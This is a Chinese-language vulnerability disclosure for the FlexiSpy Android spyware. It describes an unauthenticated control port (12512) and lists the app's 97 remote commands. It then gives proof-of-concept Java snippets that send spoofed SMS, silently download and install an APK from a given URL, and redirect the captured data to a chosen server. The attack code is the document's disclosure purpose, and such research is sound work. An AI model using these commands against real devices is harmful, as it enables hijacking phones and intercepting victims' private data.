作者：昊天实验室

---

漏洞说明

FlexiSpy安卓版在目标手机安装成功后会主动监听12512端口，该端口是客户端与服务端的通信端口，由于缺少有效的身份认证机制攻击者可通过该端口，远程发送控制指令。

漏洞详情

FlexiSPY启动时调用

public void startAppEngine(Context arg3) {  
    Intent v0 = new Intent(arg3, CoreService.class);
    v0.setAction("wfs.service.action.start_engine");
    arg3.startService(v0);
}

启动CoreService后, CoreService会调用startEngine()

public void startEngine() throws AppEngineException {  
    ......
    this.mTcpSocketCmdServer = new TcpSocketCmdServer("AppEngine", "com.vvt.rmtctrl.server", 12512, ((TcpSocketCmdProcessor)v1));
    this.mTcpSocketCmdServer.setName("RemoteControlCmdServerThread");
    this.mTcpSocketCmdServer.start();

之后FlexiSPY会开始监听12512端口。

TcpSocketCmdServer等待TcpSocketCmd(Client) 连接并调用readObject()获取TcpSocketCmd，作为Command ，调用TcpSocketCmdProcessor.processCommand(Command) 流程如下:

Client

tcpsocketcmd.execute() => connect to socket server => writeobject(this) => readobject(response)  

Server

tcpsocketcmdserver => accept => readobject(tcpsocketcmd) => TcpSocketCmdProcessor.processCommand(tcpsocketcmd) => writeobject(response)  

该Server(com.vvt.rmtctrl.server)的Processor为RemoteControlHandler。

该Processor支持的指令如下:

     RemoteFunction.IS_PRODUCT_ACTIVATED = 1;

     RemoteFunction.GET_LICENSE_STATUS = 2;

     RemoteFunction.ACTIVATE_PRODUCT = 3;

     RemoteFunction.DEACTIVATE_PRODUCT = 4;

     RemoteFunction.SET_EVENT_MAX_NUMBER = 5;

     RemoteFunction.SET_EVENT_TIMER = 6;

     RemoteFunction.ENABLE_EVENT_DELIVERY = 7;

     RemoteFunction.SET_DELIVERY_METHOD = 8;

     RemoteFunction.ENABLE_EVENT_CAPTURE = 9;

     RemoteFunction.ENABLE_CAPTURE_CALL = 10;

     RemoteFunction.ENABLE_CAPTURE_SMS = 11;

     RemoteFunction.ENABLE_CAPTURE_EMAIL = 12;

     RemoteFunction.ENABLE_CAPTURE_GPS = 13;

     RemoteFunction.SET_GPS_TIME_INTERVAL = 14;

     RemoteFunction.ENABLE_CAPTURE_MMS = 15;

     RemoteFunction.ENABLE_CAPTURE_IM = 16;

     RemoteFunction.ENABLE_CAPTURE_IMAGE = 17;

     RemoteFunction.ENABLE_CAPTURE_AUDIO = 18;

     RemoteFunction.ENABLE_CAPTURE_VIDEO = 19;

     RemoteFunction.ENABLE_CAPTURE_WALLPAPER = 20;

     RemoteFunction.ENABLE_CAPTURE_APP = 21;

     RemoteFunction.ENABLE_CAPTURE_URL = 22;

     RemoteFunction.ENABLE_CAPTURE_CALL_RECORD = 23;

     RemoteFunction.ENABLE_CAPTURE_CALENDAR = 24;

     RemoteFunction.ENABLE_CAPTURE_PASSWORD = 25;

     RemoteFunction.SET_IM_ATTACHMENT_LIMIT_SIZE = 26;

     RemoteFunction.ENABLE_CAPTURE_VOIP = 27;

     RemoteFunction.ENABLE_CAPTURE_CONTACT = 28;

     RemoteFunction.ENABLE_VOIP_CALL_RECORDING = 29;

     RemoteFunction.ENABLE_CALL_RECORDING = 30;

     RemoteFunction.ENABLE_SPY_CALL = 31;

     RemoteFunction.ENABLE_WATCH_NOTIFICATION = 32;

     RemoteFunction.SET_WATCH_FLAG = 33;

     RemoteFunction.SET_MODE_ADDRESS_BOOK = 34;

     RemoteFunction.SEND_ADDRESS_BOOK = 35;

     RemoteFunction.SET_PANIC_MODE = 36;

     RemoteFunction.ENABLE_COMMUNICATION_RESTRICTION = 37;

     RemoteFunction.ENABLE_ALERT = 38;

     RemoteFunction.ENABLE_APP_PROFILE = 39;

     RemoteFunction.ENABLE_URL_PROFILE = 40;

     RemoteFunction.MANAGE_COMMON_DATA = 41;

     RemoteFunction.GET_CONFIGURATION = 42;

     RemoteFunction.GET_SETTINGS = 43;

     RemoteFunction.GET_DIAGNOSTICS = 44;

     RemoteFunction.GET_EVENT_COUNT = 45;

     RemoteFunction.GET_GPS_ON_DEMAND = 46;

     RemoteFunction.GET_CONNECTION_HISTORY = 47;

     RemoteFunction.SEND_HEARTBEAT = 48;

     RemoteFunction.SEND_CURRENT_URL = 49;

     RemoteFunction.SEND_MOBILE_NUMBER = 50;

     RemoteFunction.SEND_SETTINGS_EVENT = 51;

     RemoteFunction.SEND_EVENTS = 52;

     RemoteFunction.SEND_BOOKMARKS = 53;

     RemoteFunction.REQUEST_CONFIGURATION = 54;

     RemoteFunction.DEBUG_SWITCH_CONTAINER = 55;

     RemoteFunction.DEBUG_SET_APPLICATION_MODE = 56;

     RemoteFunction.DEBUG_GET_APPLICATION_MODE = 57;

     RemoteFunction.DEBUG_HIDE_APP = 58;

     RemoteFunction.DEBUG_UNHIDE_APP = 59;

     RemoteFunction.DEBUG_CLOSE_APP = 60;

     RemoteFunction.DEBUG_GET_VERSION_CODE = 61;

     RemoteFunction.DEBUG_SEND_TEST_SMS = 62;

     RemoteFunction.DEBUG_RESTART_DEVICE = 63;

     RemoteFunction.SET_SUPERUSER_VISIBILITY = 64;

     RemoteFunction.SET_LOCK_PHONE_SCREEN = 65;

     RemoteFunction.REQUEST_DEVICE_SETTINGS = 66;

     RemoteFunction.SET_UPDATE_AVAILABLE_SILENT_MODE = 67;

     RemoteFunction.DELETE_DATABASE = 68;

     RemoteFunction.DEBUG_IS_DAEMON = 69;

     RemoteFunction.DEBUG_IS_FULL_MODE = 70;

     RemoteFunction.DEBUG_GET_CONFIG_ID = 71;

     RemoteFunction.DEBUG_GET_ACTUAL_CONFIG_ID = 72;

     RemoteFunction.DEBUG_IS_CALLRECORDING_SUPPORTED = 73;

     RemoteFunction.DEBUG_PRODUCT_VERSION = 74;

     RemoteFunction.REQUEST_BATTERY_INFO = 75;

     RemoteFunction.REQUEST_MEDIA_HISTORICAL = 76;

     RemoteFunction.UPLOAD_ACTUAL_MEDIA = 77;

     RemoteFunction.DELETE_ACTUAL_MEDIA = 78;

     RemoteFunction.UNINSTALL_PRODUCT = 79;

     RemoteFunction.SEND_INSTALLED_APPLICATIONS = 80;

     RemoteFunction.SPOOF_SMS = 81;

     RemoteFunction.REQUEST_CALENDER = 82;

     RemoteFunction.ON_DEMAND_IMAGE_CAPTURE = 83;

     RemoteFunction.ON_DEMAND_AMBIENT_RECORD = 84;

     RemoteFunction.SET_CALL_RECORDING_WATCH_FLAG = 85;

     RemoteFunction.RESTART_DEVICE = 86;

     RemoteFunction.ADD_URL = 87;

     RemoteFunction.RESET_URL = 88;

     RemoteFunction.CLEAR_URL = 89;

     RemoteFunction.QUERY_URL = 90;

     RemoteFunction.SET_CALL_RECORDING_AUDIO_SOURCE = 91;

     RemoteFunction.REQUEST_HISTORICAL_EVENTS = 92;

     RemoteFunction.REQUEST_TEMPORAL_APPLICATION_CONTROL = 93;

     RemoteFunction.SYNC_TEMPORAL_APPLICATION_CONTROL = 94;

     RemoteFunction.ENABLE_TEMPORAL_CONTROL_RECORD_AMBIENT = 95;

     RemoteFunction.SET_DOWNLOAD_BINARY_AND_UPDATE_SILENT_MODE = 96;

     RemoteFunction.DEBUG_IS_RESUME_ON_DEMAND_AMBIENT_RECORDING = 97;

漏洞证明

通过构造TcpSocketCmd并发送给TcpSocketCmdServer可远程调用该Processor支持的指令。

1.发送短信

RmtCtrlInputSpoofSms rmtCtrlInputSpoofSms = new RmtCtrlInputSpoofSms();  
rmtCtrlInputSpoofSms.setDestinationNumber("10086");  
rmtCtrlInputSpoofSms.setSmsMessage("test");  
controlCommand = new ControlCommand(RemoteFunction.SPOOF_SMS, rmtCtrlInputSpoofSms);  
new RemoteOnCommandReceive(controlCommand).execute();

2.更新FlexiSPY二进制文件

RmtCtrlInputDownloadBinaryAndUpdateSilentMode rmtCtrlInputDownloadBinaryAndUpdateSilentMode = new RmtCtrlInputDownloadBinaryAndUpdateSilentMode();  
rmtCtrlInputDownloadBinaryAndUpdateSilentMode.setVersionNumber("250");  
rmtCtrlInputDownloadBinaryAndUpdateSilentMode.setChecksum("387976742"); //update.apk crc32  
rmtCtrlInputDownloadBinaryAndUpdateSilentMode.setUrl("http://192.168.1.100/update.apk");  
controlCommand = new ControlCommand(RemoteFunction.SET_DOWNLOAD_BINARY_AND_UPDATE_SILENT_MODE, rmtCtrlInputDownloadBinaryAndUpdateSilentMode);  
new RemoteOnCommandReceive(controlCommand).execute();  

3.更新服务端URL

List urls = new ArrayList<>();  
urls.add("http://192.168.1.100:8080");  
controlCommand = new ControlCommand(RemoteFunction.ADD_URL, urls);  
new RemoteOnCommandReceive(controlCommand).execute();  

更新服务端URL之后，可将FlexiSPY发送给服务端的数据转到指定的服务器上。

4.卸载FlexiSPY

controlCommand = new ControlCommand(RemoteFunction.UNINSTALL_PRODUCT, null);  
new RemoteOnCommandReceive(controlCommand).execute();  

其他功能不一一演示。

POC

传送门：https://github.com/gnehsoah/FlexiSpyPOC